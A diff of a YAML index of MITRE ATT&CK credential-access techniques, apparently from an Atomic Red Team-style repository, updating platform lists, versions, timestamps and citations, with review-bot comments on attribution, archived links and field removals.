- Ram Pliskin, Microsoft Azure Security Center
- Jack Burns, HubSpot
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: |-
Administrators should set up monitoring to trigger automatic alerts when policy criteria are met. For example, using a Cloud Access Security Broker (CASB), admins can create a “High severity app permissions” policy that generates alerts if apps request high severity permissions or send permissions requests for too many users.
@@ -46461,13 +47219,14 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- SaaS
- - Office 365
- - Azure AD
- - Google Workspace
- Containers
- x_mitre_version: '1.3'
+ - IaaS
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Modification'
- 'User Account: User Account Modification'
@@ -46523,44 +47282,11 @@ credential-access:
url: https://docs.microsoft.com/en-us/azure/active-directory/develop/active-directory-v2-protocols
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1528
atomic_tests: []
T1552.006:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--8d7bd4f5-3a89-4453-9c82-2c8894d5655e
- type: attack-pattern
- created: '2020-02-11T18:43:06.253Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1552.006
- url: https://attack.mitre.org/techniques/T1552/006
- - source_name: Microsoft GPP 2016
- url: https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/dn581922(v%3Dws.11)
- description: Microsoft. (2016, August 31). Group Policy Preferences. Retrieved
- March 9, 2020.
- - url: https://msdn.microsoft.com/library/cc422924.aspx
- description: Microsoft. (n.d.). 2.2.1.1.4 Password Encryption. Retrieved April
- 11, 2018.
- source_name: Microsoft GPP Key
- - url: https://obscuresecurity.blogspot.co.uk/2012/05/gpp-password-retrieval-with-powershell.html
- description: Campbell, C. (2012, May 24). GPP Password Retrieval with PowerShell.
- Retrieved April 11, 2018.
- source_name: Obscuresecurity Get-GPPPassword
- - description: Sean Metcalf. (2015, December 28). Finding Passwords in SYSVOL
- & Exploiting Group Policy Preferences. Retrieved February 17, 2020.
- url: https://adsecurity.org/?p=2288
- source_name: ADSecurity Finding Passwords in SYSVOL
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2024-08-15T13:21:22.734Z'
name: 'Unsecured Credentials: Group Policy Preferences'
description: |
Adversaries may attempt to find unsecured credentials in Group Policy Preferences (GPP). GPP are tools that allow administrators to create domain policies with embedded credentials. These policies allow administrators to set local accounts.(Citation: Microsoft GPP 2016)
@@ -46577,25 +47303,54 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor for attempts to access SYSVOL that involve searching
for XML files. \n\nDeploy a new XML file with permissions set to Everyone:Deny
and monitor for Access Denied errors.(Citation: ADSecurity Finding Passwords
in SYSVOL)"
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'File: File Access'
- 'Command: Command Execution'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--8d7bd4f5-3a89-4453-9c82-2c8894d5655e
+ created: '2020-02-11T18:43:06.253Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1552/006
+ external_id: T1552.006
+ - source_name: Obscuresecurity Get-GPPPassword
+ description: Campbell, C. (2012, May 24). GPP Password Retrieval with PowerShell.
+ Retrieved April 11, 2018.
+ url: https://obscuresecurity.blogspot.co.uk/2012/05/gpp-password-retrieval-with-powershell.html
+ - source_name: Microsoft GPP 2016
+ description: Microsoft. (2016, August 31). Group Policy Preferences. Retrieved
+ March 9, 2020.
+ url: https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/dn581922(v%3Dws.11)
+ - source_name: Microsoft GPP Key
+ description: Microsoft. (n.d.). 2.2.1.1.4 Password Encryption. Retrieved April
+ 11, 2018.
+ url: https://msdn.microsoft.com/library/cc422924.aspx
+ - source_name: ADSecurity Finding Passwords in SYSVOL
+ description: Sean Metcalf. (2015, December 28). Finding Passwords in SYSVOL
+ & Exploiting Group Policy Preferences. Retrieved February 17, 2020.
+ url: https://adsecurity.org/?p=2288
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1552.006
atomic_tests: []
T1556.008:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2023-05-04T18:02:51.318Z'
name: Network Provider DLL
description: "Adversaries may register malicious network provider dynamic link
libraries (DLLs) to capture cleartext user credentials during the authentication
@@ -46670,11 +47425,10 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1606:
technique:
- modified: '2023-10-15T11:10:03.428Z'
+ modified: '2024-10-15T15:58:23.638Z'
name: Forge Web Credentials
description: "Adversaries may forge credential materials that can be used to
gain access to web applications or Internet services. Web applications and
@@ -46718,11 +47472,10 @@ credential-access:
- Windows
- macOS
- Linux
- - Azure AD
- - Office 365
- - Google Workspace
- IaaS
- x_mitre_version: '1.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.5'
x_mitre_data_sources:
- 'Web Credential: Web Credential Usage'
- 'Web Credential: Web Credential Creation'
@@ -46746,8 +47499,8 @@ credential-access:
url: https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/
- source_name: GitHub AWS-ADFS-Credential-Generator
description: Damian Hickey. (2017, January 28). AWS-ADFS-Credential-Generator.
- Retrieved December 16, 2020.
- url: https://github.com/damianh/aws-adfs-credential-generator
+ Retrieved September 27, 2024.
+ url: https://github.com/pvanbuijtene/aws-adfs-credential-generator
- source_name: Microsoft SolarWinds Customer Guidance
description: MSRC. (2020, December 13). Customer Guidance on Recent Nation-State
Cyber Attacks. Retrieved December 17, 2020.
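Review bot: the `GitHub AWS-ADFS-Credential-Generator` citation now points at https://github.com/pvanbuijtene/aws-adfs-credential-generator while its description still credits Damian Hickey (2017), so the URL owner and the attributed author no longer match; if the original damianh repository was removed and this is a fork, say so in the description, or cite an archived copy of the original as this diff already does for the lockstepgroup and Kaspersky references, so the attribution stays accurate.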
@@ -46763,11 +47516,10 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1621:
technique:
- modified: '2024-04-19T04:26:29.365Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Multi-Factor Authentication Request Generation
description: |-
Adversaries may attempt to bypass multi-factor authentication (MFA) mechanisms and gain access to accounts by generating MFA requests sent to users.
@@ -46778,11 +47530,13 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Jon Sternstein, Stern Security
- Pawel Partyka, Microsoft 365 Defender
- Shanief Webb
- Obsidian Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: 'Monitor user account logs as well as 2FA/MFA application
logs for suspicious events: unusual login attempt source location, mismatch
@@ -46792,16 +47546,16 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Office 365
- Linux
- macOS
- IaaS
- SaaS
- - Azure AD
- - Google Workspace
- x_mitre_version: '1.1'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Logon Session: Logon Session Metadata'
@@ -46839,13 +47593,10 @@ credential-access:
url: https://www.obsidiansecurity.com/blog/behind-the-breach-self-service-password-reset-azure-ad/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1552.008:
technique:
- modified: '2023-04-11T00:34:00.779Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Chat Messages
description: |-
Adversaries may directly collect unsecured credentials stored or passed through user communication services. Credentials may be sent and stored in user chat communication applications such as email, chat services like Slack or Teams, collaboration tools like Jira or Trello, and any other services that support user communication. Users may share various forms of credentials (such as usernames and passwords, API keys, or authentication tokens) on private or public corporate internal communications channels.
@@ -46854,6 +47605,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Douglas Weir
x_mitre_deprecated: false
@@ -46861,11 +47613,11 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Office 365
- SaaS
- - Google Workspace
- x_mitre_version: '1.0'
+ - Office Suite
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
type: attack-pattern
@@ -46883,13 +47635,10 @@ credential-access:
url: https://www.nightfall.ai/blog/saas-slack-security-risks-2020
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1212:
technique:
- modified: '2023-10-15T11:45:21.555Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Exploitation for Credential Access
description: |-
Adversaries may exploit software vulnerabilities in an attempt to collect credentials. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code.
@@ -46902,6 +47651,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- John Lambert, Microsoft Threat Intelligence Center
- Mohit Rathore
@@ -46915,12 +47665,13 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- Windows
- macOS
- - Azure AD
- x_mitre_version: '1.5'
+ - Identity Provider
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Process: Process Creation'
@@ -46952,17 +47703,14 @@ credential-access:
url: https://www.microsoft.com/en-us/security/blog/2023/07/14/analysis-of-storm-0558-techniques-for-unauthorized-email-access/
- source_name: Microsoft Midnight Blizzard Replay Attack
description: Microsoft Threat Intelligence. (2023, June 21). Credential Attacks.
- Retrieved September 27, 2023.
- url: https://twitter.com/MsftSecIntel/status/1671579359994343425
+ Retrieved September 12, 2024.
+ url: https://x.com/MsftSecIntel/status/1671579359994343425
- source_name: Technet MS14-068
description: Microsoft. (2014, November 18). Vulnerability in Kerberos Could
Allow Elevation of Privilege (3011780). Retrieved December 23, 2015.
url: https://technet.microsoft.com/en-us/library/security/ms14-068.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1056.002:
technique:
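Review bot: the Midnight Blizzard citation is re-pointed from twitter.com to x.com and re-dated September 12, 2024, but it is still a live link to a single social-media post, exactly the kind of reference this diff moves to web.archive.org elsewhere (lockstepgroup, Kaspersky); prefer an archived snapshot URL so the citation survives the post being deleted or the domain changing again.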
@@ -47035,12 +47783,11 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1056.002
atomic_tests: []
T1110:
technique:
- modified: '2024-01-29T18:53:26.593Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Brute Force
description: |-
Adversaries may use brute force techniques to gain access to accounts when passwords are unknown or when password hashes are obtained.(Citation: TrendMicro Pawn Storm Dec 2020) Without knowledge of the password for an account or set of accounts, an adversary may systematically guess the password using a repetitive or iterative mechanism.(Citation: Dragos Crashoverride 2018) Brute forcing passwords can take place via interaction with a service that will check the validity of those credentials or offline against previously acquired credential data, such as password hashes.
@@ -47049,6 +47796,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- David Fiser, @anu4is, Trend Micro
- Alfredo Oliveira, Trend Micro
@@ -47067,18 +47815,18 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '2.5'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.6'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Command: Command Execution'
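Review bot: for T1110 three platforms (`Azure AD`, `Office 365`, `Google Workspace`) are removed and only two (`Office Suite`, `Identity Provider`) are added, so this is a consolidation rather than a one-to-one rename. A consumer that previously mapped Office 365 and Google Workspace to separate test indexes now has to treat both as `Office Suite`; that mapping should be updated alongside this sync. The version bump to 2.6 is consistent with a platform-list change.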
@@ -47102,13 +47850,10 @@ credential-access:
url: https://www.dragos.com/wp-content/uploads/CRASHOVERRIDE2018.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1110.004:
technique:
- modified: '2024-03-07T14:28:02.910Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Brute Force: Credential Stuffing'
description: |-
Adversaries may use credentials obtained from breach dumps of unrelated accounts to gain access to target accounts through credential overlap. Occasionally, large numbers of username and password pairs are dumped online when a website or service is compromised and the user account credentials accessed. The information may be useful to an adversary attempting to compromise accounts by taking advantage of the tendency for users to use the same passwords across personal and business accounts.
@@ -47134,6 +47879,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Diogo Fernandes
- Anastasios Pingios
@@ -47145,18 +47891,18 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '1.5'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'User Account: User Account Authentication'
@@ -47175,14 +47921,11 @@ credential-access:
url: https://www.us-cert.gov/ncas/alerts/TA18-086A
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1110.004
atomic_tests: []
T1556.006:
technique:
- modified: '2024-04-16T00:20:21.488Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Multi-Factor Authentication
description: "Adversaries may disable or modify multi-factor authentication
(MFA) mechanisms to enable persistent access to compromised accounts.\n\nOnce
@@ -47211,24 +47954,26 @@ credential-access:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Liran Ravich, CardinalOps
- Muhammad Moiz Arshad, @5T34L7H
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- Linux
- macOS
- x_mitre_version: '1.2'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Application Log: Application Log Content'
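Review bot: besides the platform consolidation, this hunk adds a contributor line (`- Arun Seelagan, CISA`) and bumps T1556.006 to version 1.3. That is a content change from upstream, not a key move, and is easy to miss in a patch that is mostly reordering; call it out in the commit description so reviewers know the sync pulled in attribution changes as well.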
@@ -47263,13 +48008,10 @@ credential-access:
url: https://docs.microsoft.com/en-us/azure/active-directory/governance/conditional-access-exclusion
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1187:
technique:
- modified: '2023-08-14T19:30:45.123Z'
+ modified: '2024-10-15T16:33:34.508Z'
name: Forced Authentication
description: |-
Adversaries may gather credential material by invoking or forcing a user to automatically provide authentication information through a mechanism in which they can intercept.
@@ -47347,14 +48089,13 @@ credential-access:
url: https://en.wikipedia.org/wiki/Server_Message_Block
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1187
atomic_tests: []
T1056:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-08-13T17:33:45.244Z'
name: Input Capture
description: Adversaries may use methods of capturing user input to obtain credentials
or collect information. During normal system usage, users often provide credentials
@@ -47370,6 +48111,7 @@ credential-access:
phase_name: credential-access
x_mitre_contributors:
- John Lambert, Microsoft Threat Intelligence Center
+ x_mitre_deprecated: false
x_mitre_detection: 'Detection may vary depending on how input is captured but
may include monitoring for certain Windows API calls (e.g. `SetWindowsHook`,
`GetKeyState`, and `GetAsyncKeyState`)(Citation: Adventures of a Keystroke),
@@ -47378,13 +48120,13 @@ credential-access:
keylogging or API hooking are present.'
x_mitre_domains:
- enterprise-attack
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_is_subtechnique: false
x_mitre_platforms:
- Linux
- macOS
- Windows
- Network
- x_mitre_version: '1.2'
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'File: File Modification'
- 'Process: Process Creation'
@@ -47392,15 +48134,11 @@ credential-access:
- 'Process: Process Metadata'
- 'Process: OS API Execution'
- 'Driver: Driver Load'
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- - root
- - User
type: attack-pattern
id: attack-pattern--bb5a00de-e086-4859-a231-fa793f6797e2
created: '2017-05-31T21:30:48.323Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1056
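Review bot: `x_mitre_permissions_required` (Administrator, SYSTEM, root, User) is removed from T1056 with nothing replacing it, and the same field is dropped later in the patch from T1003.008 (`root`), T1556.001 (`Administrator`) and T1556.005 (`User`, `Administrator`). If any tooling in this repo reads that list, for example to annotate which tests require elevation, it needs a new source for that information before this lands. The added `revoked: false` is harmless.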
@@ -47411,9 +48149,8 @@ credential-access:
url: http://opensecuritytraining.info/Keylogging_files/The%20Adventures%20of%20a%20Keystroke.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1557.002:
technique:
@@ -47459,7 +48196,7 @@ credential-access:
The ARP protocol is stateless and does not require authentication. Therefore, devices may wrongly add or update the MAC address of the IP address in their ARP cache.(Citation: Sans ARP Spoofing Aug 2003)(Citation: Cylance Cleaver)
Adversaries may use ARP cache poisoning as a means to intercept network traffic. This activity may be used to collect and/or relay data such as credentials, especially those sent over an insecure, unencrypted protocol.(Citation: Sans ARP Spoofing Aug 2003)
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-07-22T18:37:22.176Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: ARP Cache Poisoning
x_mitre_detection: "Monitor network traffic for unusual ARP traffic, gratuitous
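Review bot: the `modified` timestamp for T1557.002 moves backwards, from `2022-11-08T14:00:00.188Z` to `2022-07-22T18:37:22.176Z`, while every other object in the patch moves forward. A regression like this usually means the old value did not come from the upstream STIX object (note this object keeps `x_mitre_attack_spec_version: 2.1.0`, so it has not been touched upstream). The same backwards move appears on T1558.002 further down (2021-04-29 -> 2020-03-25); worth confirming the generator reads one current enterprise-attack bundle rather than mixing sources.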
@@ -47478,17 +48215,16 @@ credential-access:
- 'Network Traffic: Network Traffic Flow'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1556.009:
technique:
- modified: '2024-04-18T20:53:46.175Z'
+ modified: '2024-09-16T16:54:47.595Z'
name: Conditional Access Policies
description: "Adversaries may disable or modify conditional access policies
to enable persistent access to compromised accounts. Conditional access policies
are additional verifications used by identity providers and identity and access
management systems to determine whether a user should be granted access to
- a resource.\n\nFor example, in Azure AD, Okta, and JumpCloud, users can be
+ a resource.\n\nFor example, in Entra ID, Okta, and JumpCloud, users can be
denied access to applications based on their IP address, device enrollment
status, and use of multi-factor authentication.(Citation: Microsoft Conditional
Access)(Citation: JumpCloud Conditional Access Policies)(Citation: Okta Conditional
@@ -47521,10 +48257,9 @@ credential-access:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Azure AD
- - SaaS
- IaaS
- x_mitre_version: '1.0'
+ - Identity Provider
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Modification'
- 'Cloud Service: Cloud Service Modification'
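Review bot: for T1556.009 `SaaS` is removed together with `Azure AD` and only `Identity Provider` is added, so this narrows the platform list rather than renaming an entry; `IaaS` is kept. If a SaaS index exists, this technique drops out of it. The version bump 1.0 -> 1.1 matches, and the `Azure AD` -> `Entra ID` wording change in the description is the expected upstream text update.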
@@ -47561,11 +48296,10 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1555.006:
technique:
- modified: '2023-09-30T20:24:19.357Z'
+ modified: '2024-10-15T14:20:16.722Z'
name: Cloud Secrets Management Stores
description: "Adversaries may acquire credentials from cloud-native secret management
solutions such as AWS Secrets Manager, GCP Secret Manager, Azure Key Vault,
@@ -47633,34 +48367,10 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1003.008:
technique:
- x_mitre_platforms:
- - Linux
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--d0b4fcdb-d67d-4ed2-99ce-788b12f8c0f4
- type: attack-pattern
- created: '2020-02-11T18:46:56.263Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - url: https://attack.mitre.org/techniques/T1003/008
- external_id: T1003.008
- source_name: mitre-attack
- - description: The Linux Documentation Project. (n.d.). Linux Password and Shadow
- File Formats. Retrieved February 19, 2020.
- url: https://www.tldp.org/LDP/lame/LAME/linux-admin-made-easy/shadow-file-formats.html
- source_name: Linux Password and Shadow File Formats
- - description: 'Vivek Gite. (2014, September 17). Linux Password Cracking: Explain
- unshadow and john Commands (John the Ripper Tool). Retrieved February 19,
- 2020.'
- url: https://www.cyberciti.biz/faq/unix-linux-password-cracking-john-the-ripper/
- source_name: nixCraft - John the Ripper
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2024-09-25T20:48:04.491Z'
name: 'OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow'
description: |
Adversaries may attempt to dump the contents of /etc/passwd
and /etc/shadow
to enable offline password cracking. Most modern Linux operating systems use a combination of /etc/passwd
and /etc/shadow
to store user account information including password hashes in /etc/shadow
. By default, /etc/shadow
is only readable by the root user.(Citation: Linux Password and Shadow File Formats)
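Review bot: the entire head of the T1003.008 object (platforms, domains, object_marking_refs, id, type, created, external_references) is deleted here and reappears in the next hunk with identical content, only the key order within each reference entry differs (`source_name`/`description`/`url` instead of `url`/`description`/`source_name`). The real changes are the `modified` date and a version bump, yet the diff shows roughly 25 removed and 25 added lines. Normalising key order in the generator once, in its own commit, would make future upstream syncs reviewable line by line.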
@@ -47669,20 +48379,42 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_deprecated: false
x_mitre_detection: The AuditD monitoring tool, which ships stock in many Linux
distributions, can be used to watch for hostile processes attempting to access
/etc/passwd
and /etc/shadow
, alerting on the pid,
process name, and arguments of such programs.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'File: File Access'
- 'Command: Command Execution'
- x_mitre_permissions_required:
- - root
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--d0b4fcdb-d67d-4ed2-99ce-788b12f8c0f4
+ created: '2020-02-11T18:46:56.263Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1003/008
+ external_id: T1003.008
+ - source_name: Linux Password and Shadow File Formats
+ description: The Linux Documentation Project. (n.d.). Linux Password and Shadow
+ File Formats. Retrieved February 19, 2020.
+ url: https://www.tldp.org/LDP/lame/LAME/linux-admin-made-easy/shadow-file-formats.html
+ - source_name: nixCraft - John the Ripper
+ description: 'Vivek Gite. (2014, September 17). Linux Password Cracking: Explain
+ unshadow and john Commands (John the Ripper Tool). Retrieved February 19,
+ 2020.'
+ url: https://www.cyberciti.biz/faq/unix-linux-password-cracking-john-the-ripper/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1003.008
atomic_tests: []
T1558.002:
@@ -47714,7 +48446,7 @@ credential-access:
from Memory. Retrieved October 11, 2019.
url: https://medium.com/threatpunter/detecting-attempts-to-steal-passwords-from-memory-558f16dce4ea
source_name: Medium Detecting Attempts to Steal Passwords from Memory
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-25T21:46:46.831Z'
name: 'Steal or Forge Kerberos Tickets: Silver Ticket'
description: |-
Adversaries who have the password hash of a target service account (e.g. SharePoint, MSSQL) may forge Kerberos ticket granting service (TGS) tickets, also known as silver tickets. Kerberos TGS tickets are also known as service tickets.(Citation: ADSecurity Silver Tickets)
@@ -47740,13 +48472,11 @@ credential-access:
- 'Logon Session: Logon Session Metadata'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1558.002
